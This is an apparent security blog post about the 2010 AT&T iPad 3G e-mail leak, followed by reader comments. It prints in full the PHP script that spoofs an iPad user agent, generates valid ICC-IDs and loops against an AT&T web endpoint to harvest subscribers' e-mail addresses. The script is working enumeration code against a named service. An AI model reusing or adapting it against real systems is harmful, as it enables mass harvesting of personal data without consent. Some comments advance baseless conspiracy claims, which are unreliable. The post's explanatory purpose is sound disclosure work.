114,000 iPad Owners: The Script that Harvested Their E-mail Addresses
Here is the script referenced in the Gawker story from earlier that describes how a number of early iPad 3G subscribers, including names like Harvey Weinstein, Michael Bloomberg, Diane Sawyer, and Rahm Emanuel had their e-mails revealed via a poorly designed web application hosted by AT&T.
Goatse Security, named for the famous Internet shock image, wrote the script to harvest e-mail addresses by providing ICC-ID numbers (integrated circuit card identifier, a number that associates a SIM card with a subscriber) and parsing the returned e-mail address.
High profile users from the list of harvested e-mail addresses.
After speaking with Goatse Security member Weev, he was kind enough to share the script:
<?php
// iPad 3G Account Slurper
//
// Usage: ./ipadump.php ICCID-base count
// (The script generates the final checkdigit to produce ICCIDs from the entered base)
$useragent="Mozilla/5.0 (iPad)"; //Spoof as iPad
$ICCIDroot = $_SERVER['argv'][1];
$ICCIDcount = $_SERVER['argv'][2];
function genluhn($number){ //Crappy home-made Luhn checkdigit generator
$i = strlen($number)-1;
do {
$array[] = $number[$i];
$i--;
} while ($i > -1);
$i = 0;
foreach ($array as $digit) {
if (!($i & 1)){
$digit = $digit * 2;
if ($digit >= 10) {
$digit = $digit - 9;
}
}
$total += $digit;
$i++;
}
$luhn = 10 - ($total % 10);
if ($luhn == 10) $luhn=0;
return $luhn;
}
while (1) { //Continue FOREVER
$ch = curl_init(); //Set up cURL
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); //Since theres a lot of redirection
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies"); //See later
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //Returns any and all data
$ICCID = $ICCIDroot.genluhn(strval($ICCIDroot)); //Generate checkdigit and attach it to
the ICCID
curl_setopt($ch, CURLOPT_URL, "https://dcp2.att.com/OEPClient/openPage?ICCID=".strval($ICCID)."&IMEI=0");
$output = curl_exec($ch); //Load first page with ICCID
curl_setopt($ch, CURLOPT_URL, "https://dcp2.att.com/OEPClient/Customer");
$output = curl_exec($ch); //Now load page that is normally redirected with JavaScript.
cURL is nice and passes the previously GET'd info
curl_close($ch);
//print $output; //Prints HTML result
if (!($counter % 50)) echo "-".strval($ICCID)."-\n"; //Prints ICCID every 50 counts just
to keep track of how far the script has gotten
//Parse output. Terribly sloppy
if (preg_match("/<title>Error<\/title>/", $output, $match)) {
preg_match("/<div class=\"info-container\">(.*)<br>(.*)<br>/msU", $output,
$match);
$match[0] = preg_replace("/<div class=\"info-container\">\n\s\s+/","",$match[0]);
$match[0] = preg_replace("/<\/b><br>/", "<\/b> <br>", $match[0]); //Because I
want space between the period and the next sentence, dammit
$errnum = strip_tags($match[0]);
$status = "Error! ".$errnum; //Return specific error message
} else if (preg_match("<input id=\"email\" name=\"email\" type=\"email\"
placeholder=\"Required\" value=\".*\@.*\" autocapitalization=\"off\" autocorrect=\"off\">",
$output, $match)) {
$match[0] = preg_replace("/input id=\"email\" name=\"email\" type=\"email\"
placeholder=\"Required\" value=\"/","",$match[0]);
$status = preg_replace("/\" autocapitalization=\"off\" autocorrect=\"off\"/", "",
$match[0]); //Return email address
} else {
$status = "Inactive"; //Assume SIM is inactive if nothing tells us otherwise. Bad
logic, will fix.
}
if ($status != "Inactive") echo strval($ICCID)." : ".$status."\n"; //Print ICCID with error
message or email address. Can print if ICCID is inactive, but it makes for a long, redundant log.
if ($counter == $ICCIDcount) exit;
$ICCIDroot++; //step ICCID
$counter++; //step loop counter
}
?>
There are probably a few things worth pointing out. They had to set the user-agent string to be the iPad as shown:
$useragent="Mozilla/5.0 (iPad)";
The vulnerable URL at att.com was:
https://dcp2.att.com/OEPClient/openPage?ICCID=Insert number here&IMEI=0
And that’s it, an e-mail address gets returned in the successful iterations (active ICCID) and parsed. There’s no hack, no infiltration, and no breach, just a really poorly designed web application that returns e-mail address when ICCID is passed to it.
Filed Under: Enumeration
well, good for you!
Its good for you, you get to see what the referenced PHP program looks like. We had already seen it.
Where did you see it, as I haven’t seen it myself.
sd
[...] upshot is that, as this page rightly points out (thanks to @securityninja for the link) “There’s no hack, no infiltration, and no [...]
[...] reports that by exploiting a vulnerability in the AT&T Web site, hacker group Goatse Security was able to collect email addresses associated with the SIM [...]
[...] Prefect has the actual PHP script itself, courtesy of Goatse member Weev, if you would like to take a look at it now that AT&T has fixed the [...]
“There’s no hack, no infiltration, and no breach, just a really poorly designed web application…”
Like “real” hacks are all different somehow.
None of us are really sure what you’re driving at there Captain NotObviousEnough.
[...] Web application that returns e-mail address when ICC-ID is passed to it,” says Praetorian Security Group in a blog post on the [...]
This is the very definition of a hack – “modification of a program or device to give the user access to features that were otherwise unavailable” You fake your user-agent and then hammer a URL, it’s called hacking. What is surprising is that AT&T didn’t have any Denial of Service measures in place, surely the one IP hitting this url a million times should have raised some alarms.
That’s kind of semantics right? Based on that definition, your browser is performing a “hack” right now to read this web site.
I guess my point is that it doesn’t rise to the level of a criminal intrusion, being more akin to an NMAP scan, which is what popular media thinks of with the world “hack”.
[...] auf praetorianprefect.com nach zu lesen ist, wurde mittels einem relativ einfachem PHP-Script ein Leck in einer AJAX-API [...]
Just by reading the description of the hack, one can easily visualize in his preferred programming language the way they did the job, just need the pattern of an ICC-ID, the script is pretty uninteresting at this point. It only shows that Gawker will pay anyone, even 4chan tards to discredit Apple in any way (as shown by the title which is false)
Seeing the script helped to make some sense out of what Gawker was reporting, and I had wanted to see the actual request to AT&T to see if there was anything more to it:
https://dcp2.att.com/OEPClient/openPage?ICCID=Insert number here&IMEI=0
Apple must have known how this worked at some level, and there owns some culpability for not objecting to the design. But the initial Gawker reporting was over the top and misleading.
But you’re entitled to your opinion.
[...] wrote a PHP script that flooded AT&T’s Web site with possible ICC-ID numbers and logged responses when the [...]
[...] e-mail address when ICC-ID is passed to it,” Praetorian said in a late Wednesday entry on its security blog [...]
[...] e-mail address when ICC-ID is passed to it,” Praetorian said in a late Wednesday entry on its security blog [Computer [...]
[...] e-mail address when ICC-ID is passed to it,” Praetorian said in a late Wednesday entry on its security blog [Computer [...]
[...] e-mail address when ICC-ID is passed to it,” Praetorian said in a late Wednesday entry on its security blog [Computer [...]
looks like an inside job by employee/coder at AT&T, purposfully writing vlunerable script for a PR Stunt involving Weev. A Cheap shot aimed at Apple/Google, through another interface.
Just another windows/microsoft type sleazy goings on, who have a neverending viral problem, fixed by buying new computers and viral software, because of a poor operating system, compared to apple who fixes any breech virtually before it occurs for free.
It may involve the israel-chinese affair of trying to boot google-apple because of their reluctance to censor data for pseudo-religious/political-business/competition reasons. And a really sleazy alogical jstification shot at not allowing some of apples new single face computers to be sold in isreal
This is the great nothing, a cheap shot at a bad PR Stunt, taken up in the news media, who does as they are told
“43f@adf*fx$” makes more sense. what are you smoking buddy?
[...] with law enforcement to investigate. To get the email addresses, the hackers took advantage of a home grown PHP script, which sent ICC ID numbers from SIM's to the AT&T server. The server was expecting to be called [...]
[...] The script that harvested 114,000 iPad users’ data [...]
If the data is in clear text, not protected and can simply be parsed I hardly call that a hack.
That almost sounds like what goes on in any company every day. That data should have been behind a firewall.
Sounds totally unresponsible on AT&Ts part.
ooh cute